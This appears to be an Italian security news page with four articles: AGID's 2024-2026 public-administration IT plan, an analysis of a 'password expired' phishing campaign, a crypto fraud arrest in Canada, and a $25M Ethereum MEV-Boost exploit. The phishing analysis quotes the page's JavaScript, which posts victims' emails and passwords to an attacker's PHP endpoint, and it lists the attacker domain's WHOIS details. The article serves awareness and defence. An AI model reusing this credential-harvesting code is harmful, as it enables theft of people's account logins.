Sicurezza Informatica
Digitale nella PA, AGID vara il Piano Triennale 2024-2026
Tempo di lettura: 3 minuti. Agid vara il Piano Triennale 2024-2026 per l’informatica nella PA italiana e mira a accelerare la trasformazione digitale
Il Piano Triennale per l’informatica nella Pubblica Amministrazione (PA) 2024-2026 varato da AGID emerge come un faro guida per la trasformazione digitale dell’Italia, ponendo le fondamenta per una rivoluzione amministrativa all’insegna dell’innovazione tecnologica. In un’era segnata da rapidi cambiamenti socio-economici, l’adozione di soluzioni tecnologiche avanzate e l’armonizzazione delle normative digitali diventano imperativi ineludibili per le pubbliche amministrazioni.
Il Cuore del Piano Triennale
Con radici che affondano nella sua prima edizione del 2017-2019, il Piano Triennale si è evoluto per diventare un documento cardine nel delineare le strategie e gli obiettivi di digitalizzazione per la PA italiana. L’edizione 2024-2026, in particolare, si distingue per una struttura rinnovata e un approccio che pone al centro le esigenze di una PA agile e orientata al futuro, promuovendo la reingegnerizzazione dei processi amministrativi secondo il principio “once only”.
La Sicurezza Informatica come Pilastro Fondamentale
Un capitolo di cruciale importanza nel Piano è dedicato alla sicurezza informatica, una priorità inderogabile nel contesto dell’espansione digitale. L’istituzione dell’Agenzia per la Cybersicurezza Nazionale (ACN) e l’adozione di una Strategia nazionale di cybersicurezza sottolineano l’impegno dell’Italia nel rafforzare le difese cyber del Paese, proteggendo l’infrastruttura critica e assicurando la resilienza dei sistemi informatici della PA.
Obiettivi e Strategie di Implementazione
Il Piano stabilisce obiettivi chiari e misurabili per la sicurezza informatica, tra cui la distribuzione di Indicatori di Compromissione (IoC) a tutte le PA entro il 2026 e il supporto formativo rivolto a innalzare la consapevolezza delle minacce cyber. Le linee di azione si articolano in iniziative di monitoraggio proattivo, strumenti per l’autovalutazione dei rischi cyber, e programmi formativi destinati a rafforzare la cultura della cybersicurezza all’interno delle amministrazioni.
Risorse e Supporto per l’Attuazione
Il finanziamento del Piano Nazionale di Ripresa e Resilienza (PNRR) e dei Fondi Europei 2021-2027 rappresentano le leve finanziarie per realizzare gli ambiziosi obiettivi del Piano. Questi investimenti si tradurranno in un salto qualitativo per la sicurezza informatica della PA, attraverso l’introduzione di servizi avanzati come l’HyperSOC per il monitoraggio delle vulnerabilità e la piattaforma Syllabus per lo sviluppo delle competenze digitali.
Nell’ambito del rafforzamento della sicurezza informatica nelle Pubbliche Amministrazioni (PA), il Piano Triennale 2024-2026 di AGID pone particolare enfasi sulla distribuzione e l’implementazione degli Indicatori di Compromissione (IoC) e sul potenziamento degli strumenti di autovalutazione. Questi obiettivi sono fondamentali per elevare il livello di difesa delle PA contro le minacce cyber e migliorare la gestione dei rischi informatici.
Distribuzione degli Indicatori di Compromissione
L’obiettivo RA7.6.1 si concentra sulla distribuzione degli IoC alle PA, con l’ambizione di raggiungere una copertura completa entro il 2026. Gli IoC sono strumenti vitali per l’identificazione precoce di potenziali minacce, consentendo alle PA di adottare misure preventive e reattive in modo tempestivo. Il monitoraggio proattivo delle minacce cyber, attraverso la diffusione di IoC, rappresenta una strategia chiave per innalzare il livello di sicurezza informatica all’interno del dominio della PA.
Strumenti di Autovalutazione per le PA
Con l’obiettivo RA7.6.2, il Piano prevede la fornitura di strumenti funzionali all’esecuzione dei piani di autovalutazione dei sistemi esposti. Questi strumenti, messi a disposizione sul Portale del CERT-AGID, sono essenziali per consentire alle PA di valutare autonomamente la propria postura di sicurezza e identificare eventuali vulnerabilità. L’accesso a tali risorse contribuisce a promuovere un approccio proattivo alla gestione del rischio cyber, rafforzando la resilienza delle infrastrutture informatiche.
Formazione e Sensibilizzazione
L’obiettivo RA7.6.3 mira a fornire supporto formativo e informativo alle PA, in particolare agli Responsabili per la Transizione Digitale (RTD), per aumentare il livello di consapevolezza sulle minacce cyber. La formazione è un pilastro fondamentale per costruire una cultura della sicurezza informatica all’interno delle PA, dotando i dipendenti delle conoscenze necessarie per riconoscere e contrastare efficacemente gli attacchi informatici.
Implementazione e Risorse
Il Piano sottolinea l’importanza di strumenti e servizi nazionali, come l’HyperSOC e il Portale Servizi Agenzia (ACN), per il monitoraggio delle vulnerabilità e il supporto all’identificazione, analisi e mitigazione di minacce e incidenti. Le risorse e i finanziamenti previsti dal PNRR e dai Fondi per la Strategia nazionale di cybersicurezza sono essenziali per realizzare questi obiettivi, garantendo alle PA gli strumenti necessari per affrontare le sfide della sicurezza informatica.
Il documento stabilisce un percorso chiaro per rafforzare la sicurezza informatica delle PA italiane, attraverso la distribuzione di IoC, l’implementazione di strumenti di autovalutazione e il potenziamento delle attività formative. Questi sforzi congiunti contribuiranno a creare un ambiente digitale più sicuro e resiliente per le PA, in linea con gli obiettivi strategici del Decennio Digitale 2030.
Il Piano Triennale 2024-2026 dell’AGID riflette un impegno concreto verso la digitalizzazione della PA italiana, con un occhio di riguardo per la sicurezza informatica. Attraverso un approccio olistico che integra tecnologia, normativa e formazione, il Piano getta le basi per un’Amministrazione Pubblica più efficiente, trasparente e sicura, pronta a rispondere alle sfide del Decennio Digitale 2030.
Sicurezza Informatica
La tua password è scaduta: nuova ondata di attacchi phishing
Tempo di lettura: 4 minuti. Il phishing è una tecnica utilizzata dai criminali informatici per ottenere informazioni personali, come password, numeri di carte di credito e dati finanziari, fingendosi di essere entità affidabili.
Introduzione: Gli attacchi di phishing sono una minaccia sempre più diffusa nel mondo digitale. Con l’aumento dell’uso di Internet e delle comunicazioni via email, i cybercriminali trovano sempre nuovi modi per ingannare le persone e rubare informazioni sensibili. In questo articolo, esploreremo cos’è il phishing, come funziona e come puoi proteggerti da esso.
Cos’è il Phishing: Il phishing è una tecnica utilizzata dai criminali informatici per ottenere informazioni personali, come password, numeri di carte di credito e dati finanziari, fingendosi di essere entità affidabili. Questi truffatori inviano email o messaggi che sembrano provenire da aziende o istituzioni legittime, come banche, social network o siti di e-commerce, al fine di ingannare le vittime e convincerle a fornire le proprie informazioni.
Come Funziona il Phishing: Gli attacchi di phishing possono assumere diverse forme, ma generalmente seguono un processo simile:
- Email di Phishing: Il truffatore invia un’email che sembra provenire da un’azienda conosciuta, chiedendo alla vittima di fornire informazioni personali o di fare clic su un link fraudolento.
- Link Fraudolenti: Il messaggio di phishing contiene un link che porta a una pagina web contraffatta che sembra autentica. Questa pagina può chiedere di accedere al tuo account o di inserire informazioni sensibili.
- Raccolta di Dati: Una volta che la vittima fornisce le informazioni richieste, i truffatori le utilizzano per rubare denaro, identità o altre informazioni sensibili.
Un caso reale di attacco
Questo che segue è un esempio di email ricevuta in una mia casella di posta elettronica. Siccome sono il provider di me stesso è stato subito evidente che si trattasse di un tentativo di phishing:
Il messaggio è in inglese, ed è stato ricevuto da migliaia di utenti che sono stati avvisati del fatto che la loro password era scaduta e che se non si fosse seguito il link il loro account sarebbe stato sospeso.
Io ovviamente ho seguito il link, e la pagina che mi è comparsa è questa:
La prima cosa che possiamo notare è come viene generata una finta pagina di accesso alla email con il nome estratto dal dominio della vittima ed in alcuni casi anche l’icona presa dal sito.
Non è molto complicato generare una pagina del genere, tutte le informazioni sono contenute nell’indirizzo email del malcapitato.
Inserendo la propria password questa viene inviata al server dell’hacker ed archiviata.
Come hanno fatto a trovare la mia email?
Prima di procedere a questo attacco gli hacker fanno una scansione del web, cercando in tutti i siti, forum pubblici, profili social e raccolgono milioni di email.
Successivamente vengono inviate le email e si aspettano gli utenti che “abboccano”
Il sito che viene presentato ha questo indirizzo URL
La pagina è ospitata su un gateway IPFS di CloudFlare.
Cosa è un server IPFS?
Un IPFS gateway funge da intermediario tra la rete IPFS decentralizzata e il World Wide Web tradizionale, consentendo agli utenti di accedere ai contenuti IPFS tramite il web utilizzando URL standard. Ciò rende i contenuti IPFS accessibili a una più ampia base di utenti e facilita l’integrazione dei contenuti IPFS con le applicazioni web esistenti.
In pratica l’origine del contenuto non è facilmente rintracciabile perchè schermata dal gateway.
Analisi del codice della pagina di phishing
Analizzando il codice della pagina è possibile vedere dove vengono inviati i dati raccolti in maniera fraudolenta.
$.ajax({
dataType: 'JSON',
url: 'https://winnersolution.us/TWE/gen.php',
type: 'POST',
data:{
email:email,
password:password,
},
Questo è un pezzo di codice presente nello JavaScript della pagina. Senza scendere nel tecnico, il contenuto del form (la nostra email e la password che abbiamo inserita) viene trasmesso ad uno script ospitato sul dominio “winnsersolution.us” che è un dominio gratuito registrato sul provider NameCheap ed ovviamente non intestato a nessuno.
Admin Name: Ego Mbute
Admin Organization: fiko
Admin Street: 95485085 jfkkf ltd
Admin Street: 95485085 jfkkf ltd
Admin Street:
Admin City: New York
Admin State/Province: NY
Admin Postal Code: 10010
Admin Country: US
Admin Phone: +1.480480883
Admin Phone Ext:
Admin Fax: +1.9484894494
Admin Fax Ext:
Admin Email: ashley.treasurecn@gmail.com
Cosa abbiamo trovato nel server degli hacker?
Abbiamo trovato lo stesso script “gen.php” ripetuto diverse volte ed in diverse cartelle con date che vanno dal 13 al 15 maggio 2024, questo articolo è stato scritto il 16 maggio.
Questo hacker (non molto esperto) ha appena iniziato la sua attività di attacco, ed evidentemente dopo aver raccolto le email dei malcapitati lascerà scadere il dominio è l’hosting e passerà ad una nuova fase di attacco.
Abbiamo rintracciato il server che ha inviato l’email
Nei file log del server di posta elettronica siamo riusciti a trovare l’indirizzo del server che ha originato il messaggio fraudolento.
Il server ed il dominio ( jpcompaniesinc.com ) appartengono ad una azienda che molto probabilmente è stata hackerata in precedenza, e la loro casella di posta utilizzata per inviare altri messaggi.
Come Proteggerti dal Phishing: Proteggerti dagli attacchi di phishing è essenziale per mantenere al sicuro le tue informazioni. Ecco alcuni consigli utili:
- Verifica l’Autenticità: Controlla attentamente l’indirizzo email del mittente e verifica se corrisponde all’azienda o all’istituzione che dice di essere.
- Attenzione ai Link: Non fare clic su link sospetti presenti nelle email. Se devi accedere a un sito web, digita direttamente l’URL nella barra degli indirizzi del tuo browser.
- Non Condividere Informazioni Sensibili: Mai fornire password, numeri di carte di credito o altri dati sensibili tramite email, soprattutto se richiesto in modo non sollecitato.
- Utilizza Soluzioni di Sicurezza: Installa e aggiorna regolarmente un buon software antivirus e antimalware sul tuo computer e dispositivo mobile.
- Sii Consapevole: Sviluppa una consapevolezza delle pratiche di sicurezza online e educa te stesso e i tuoi dipendenti o familiari su come riconoscere e evitare gli attacchi di phishing.
Sicurezza Informatica
Autorità Canadesi arrestano il “Crypto King” per frode da 30 milioni
Tempo di lettura: < 1 minuto. Le Autorità canadesi arrestano il “Crypto King” per una frode da 30 di dollari ecco i dettagli dell’arresto e le implicazioni
Le autorità canadesi hanno arrestato il sedicente “Crypto King” con l’accusa di frode per un ammontare di 30 milioni di dollari. Questo caso evidenzia i rischi associati agli investimenti in criptovalute e l’importanza di una regolamentazione più rigorosa nel settore.
Dettagli dell’arresto
Il “Crypto King” è stato accusato di aver orchestrato uno schema di frode che ha portato alla perdita di 30 milioni di dollari da parte degli investitori. Le indagini hanno rivelato che il sospetto utilizzava tattiche ingannevoli per attrarre investitori, promettendo rendimenti elevati attraverso investimenti in criptovalute.
Indagini e collaborazioni
L’inchiesta è stata condotta con la collaborazione di diverse agenzie investigative canadesi. Queste indagini hanno incluso la raccolta di prove, l’analisi di transazioni finanziarie e l’interrogazione di testimoni. Le autorità hanno sottolineato l’importanza della cooperazione internazionale per combattere le frodi nel settore delle criptovalute.
Implicazioni per gli investitori
Questo caso mette in luce i pericoli delle frodi legate alle criptovalute e l’importanza di fare ricerche approfondite prima di investire. Gli esperti consigliano di essere cauti e di consultare consulenti finanziari qualificati prima di effettuare investimenti in ICO, IEO o altre opportunità di investimento in criptovalute.
Regolamentazione del Settore
L’arresto del “Crypto King” potrebbe accelerare gli sforzi per una regolamentazione più rigorosa del settore delle criptovalute in Canada e a livello globale. Le autorità stanno considerando misure per proteggere meglio gli investitori e prevenire future frodi. La frode da 30 milioni di dollari orchestrata dal “Crypto King” sottolinea la necessità di una maggiore vigilanza nel settore delle criptovalute. Gli investitori devono essere consapevoli dei rischi e fare ricerche approfondite prima di impegnare i loro fondi in questo mercato volatile.
Sicurezza Informatica
Arrestati per furto di 25 Milioni alla Blockchain di Ethereum
Tempo di lettura: 2 minuti. Due fratelli arrestati per aver rubato 25 milioni di dollari in un attacco alla blockchain di Ethereum. Scopri i dettagli dello schema e delle tecniche utilizzate.
Il Dipartimento di Giustizia degli Stati Uniti ha incriminato due fratelli per aver manipolato la blockchain di Ethereum e per il furto di 25 milioni di dollari in criptovalute in circa 12 secondi, in uno schema senza precedenti.
Dettagli dell’inchiesta e dell’arresto
Anton Peraire-Bueno e James Pepaire-Bueno sono stati arrestati a Boston e New York con accuse di frode elettronica e cospirazione per commettere frode elettronica e riciclaggio di denaro. Se condannati, ciascuno di loro potrebbe affrontare una pena massima di 20 anni di prigione per ogni capo d’accusa.
L’inchiesta è stata condotta dall’Unità di Investigazioni Cibernetiche dell’IRS Criminal Investigation (IRS-CI) di New York, con l’assistenza del Dipartimento di Polizia di New York e della U.S. Customs and Border Protection.
Schema di manipolazione della Blockchain
I due imputati hanno manipolato i processi di convalida delle transazioni sulla blockchain accedendo a transazioni private in sospeso, alterandole, ottenendo criptovalute delle vittime e rifiutando le richieste di restituzione dei fondi rubati. Invece, hanno preso misure per nascondere i loro guadagni illeciti.
L’atto d’accusa afferma che i fratelli hanno studiato i comportamenti di trading delle loro vittime mentre preparavano l’attacco a partire da dicembre 2022 e hanno preso misure per nascondere le loro identità e i proventi rubati. Hanno anche utilizzato più indirizzi di criptovaluta e scambi esteri e hanno creato società di comodo.
Tecniche Utilizzate
Durante la pianificazione e l’esecuzione dell’attacco, hanno intrapreso le seguenti azioni:
- Creazione di Validatori Ethereum: Hanno stabilito una serie di validatori Ethereum in modo da nascondere le loro identità attraverso l’uso di società di comodo, indirizzi di criptovaluta intermediari, scambi esteri e una rete di livello di privacy.
- Transazioni di Test: Hanno effettuato una serie di transazioni di test o “transazioni esca” per identificare le variabili più probabili da attrarre per i MEV Bot che sarebbero diventati le vittime dell’exploit.
- Sfruttamento della Vulnerabilità: Hanno identificato e sfruttato una vulnerabilità nel codice del relè MEV-Boost che causava il rilascio prematuro del contenuto completo di un blocco proposto.
- Riordinamento del Blocco: Hanno riordinato il blocco proposto a loro vantaggio e pubblicato il blocco riordinato sulla blockchain di Ethereum, risultando nel furto di circa 25 milioni di dollari in criptovalute.
Reazioni delle Autorità
Thomas Fattorusso, agente speciale dell’IRS-CI, ha dichiarato che questi fratelli hanno commesso una manipolazione senza precedenti della blockchain di Ethereum, accedendo fraudolentemente alle transazioni in sospeso, alterando il movimento della valuta elettronica e rubando alla fine 25 milioni di dollari in criptovalute dalle loro vittime.
- Editoriali2 settimane fa
Chip e smartphone cinesi ci avvisano del declino Occidentale
- Inchieste2 settimane fa
Ransomware in Italia: come cambia la percezione del fenomeno nell’IT
- Economia2 settimane fa
Internet via satellite: progetto europeo IRIS² in grande difficoltà
- Editoriali1 settimana fa
Anche su Giovanna Pedretti avevamo ragione
- L'Altra Bolla1 settimana fa
Jack Dorsey getta la spugna e lascia Bluesky
- Inchieste1 settimana fa
Perchè il motore di ricerca OpenAI fa paura ai giornalisti?
- L'Altra Bolla1 settimana fa
Meta arriva l’intelligenza artificiale per la Pubblicità
- L'Altra Bolla1 settimana fa
TikTok: azione legale contro Stati Uniti per bloccare il divieto